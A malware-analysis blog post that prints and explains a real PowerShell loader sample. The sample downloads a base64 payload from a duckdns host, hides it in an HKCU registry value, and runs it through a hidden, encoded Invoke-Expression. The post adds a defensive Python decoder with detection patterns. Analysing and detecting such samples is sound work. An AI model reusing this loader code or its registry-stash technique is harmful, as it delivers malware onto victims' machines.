Analysis Malicious Powershell Part 2

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
By Diyar Saadi | WIN32 | July 15, 2025

In this article, we analyze another PowerShell file that is used to download and run malware.

Sample link: https://bazaar.abuse.ch/sample/cf0aea3ef14b4587489a9163ee8840f2e388fd0f928f9d5f60d31582a69a9d1f/

Malicious PowerShell code:

    #$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"
    #$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1"
    #$webClient = New-Object System.Net.WebClient
    #$base64Code = $webClient.DownloadString($url)
    #Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String
    #$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));
    Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=

Malicious PowerShell analysis:

The first six lines are commented out in the sample (each begins with `#`), so only the final Start-Process line actually executes; the commented lines still document how the payload was staged.

1. The malware author declares a variable holding the URL of the base64-encoded payload file: `#$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"`.

2. A second `$url` assignment points at the encoded PowerShell script: `#$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1"`.

3. A WebClient object is created to fetch those URLs: `#$webClient = New-Object System.Net.WebClient`.

4. `DownloadString` retrieves the base64 / .ps1 content into a variable: `#$base64Code = $webClient.DownloadString($url)`.

5. The base64-encoded payload is written into a registry value under HKCU, so the payload is kept in the registry rather than as a file on disk: `#Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String`.

6. The base64 file is downloaded directly: `#$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));`

7. Finally, the live Start-Process line launches a hidden PowerShell child process (`-WindowStyle Hidden`) with an encoded command (`-ec`). The `-ec` argument is UTF-16LE text encoded as base64; it decodes to `iNVoKe-eXpReSsIon ((Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZf') | Select-Object -ExpandProperty `$phantom-frZZf)`, which reads the payload stored in the registry value from step 5 back out and runs it with Invoke-Expression. The mixed-case cmdlet name is there to defeat naive case-sensitive string matching.
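As an added example (not code from the original post or from the sample's author), the following Python script shows how an analyst can decode a `-ec`/`-EncodedCommand` argument offline, without running it, and flag the indicators seen in the sample: a hidden window, an encoded command, Invoke-Expression inside the decoded payload, and a Get-ItemProperty read of the Windows Search registry key. The command line it is run on is constructed here to mirror the Start-Process line above (the registry path and value name are the sample's; the rest is built in the script), and the `triage`, `decode_encoded_command` and indicator names are this example's own, not those of any standard tool.

```python
import base64
import re
from typing import Optional

# Added example (not from the original post). Decodes PowerShell -EncodedCommand
# blobs offline and scores a process command line against the indicators the
# sample above exhibits. Function and indicator names are this example's own.

def encode_command(script: str) -> str:
    """Produce what PowerShell's -EncodedCommand expects: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(blob: str) -> str:
    """Decode a -ec/-EncodedCommand argument without executing it.
    Characters outside the base64 alphabet (copy/paste artefacts such as a
    stray '#') are dropped and padding is repaired before decoding."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-16-le")

# Matches -e, -ec, -enc and -EncodedCommand followed by the blob itself.
_ENC_ARG = re.compile(r"-(?:ec|e|enc|encodedcommand)\s+([A-Za-z0-9+/=#]+)", re.IGNORECASE)

def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the encoded-command blob from a command line, or None if absent."""
    match = _ENC_ARG.search(cmdline)
    return match.group(1) if match else None

# Indicators drawn from the behaviour analysed above. They are evaluated against
# the visible command line *and* the decoded payload, so case-mangled cmdlet
# names inside the blob (iNVoKe-eXpReSsIon) are still caught via re.IGNORECASE.
INDICATORS = {
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.IGNORECASE),
    "encoded_command": re.compile(r"-(?:ec|e|enc|encodedcommand)\s", re.IGNORECASE),
    "invoke_expression": re.compile(r"invoke-expression", re.IGNORECASE),
    "registry_payload_read": re.compile(
        r"get-itemproperty.*HKCU:\\Software\\Microsoft\\Windows Search", re.IGNORECASE),
    "download_string": re.compile(r"\.downloadstring\(", re.IGNORECASE),
}

def triage(cmdline: str) -> dict:
    """Decode any encoded argument and report which indicators fire."""
    blob = extract_encoded_argument(cmdline)
    decoded = decode_encoded_command(blob) if blob else None
    searchable = cmdline + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(searchable))
    return {"decoded": decoded, "indicators": hits}

# Constructed sample mirroring the Start-Process line above (the registry path and
# value name are the sample's; the surrounding command line is built here).
SAMPLE_PAYLOAD = (r"Invoke-Expression ((Get-ItemProperty -Path "
                  r"'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZf') "
                  r"| Select-Object -ExpandProperty '$phantom-frZZf')")
SAMPLE_CMDLINE = "powershell -WindowStyle Hidden -ec " + encode_command(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("decoded :", result["decoded"])
    print("hits    :", ", ".join(result["indicators"]))
```

Running the script prints the recovered Invoke-Expression payload and four firing indicators; `download_string` stays silent because the live line in the sample never calls `DownloadString`, that only happens in the commented-out staging lines. Feeding a process-creation log's command-line field through `triage` one line at a time is the natural way to use it in detection work.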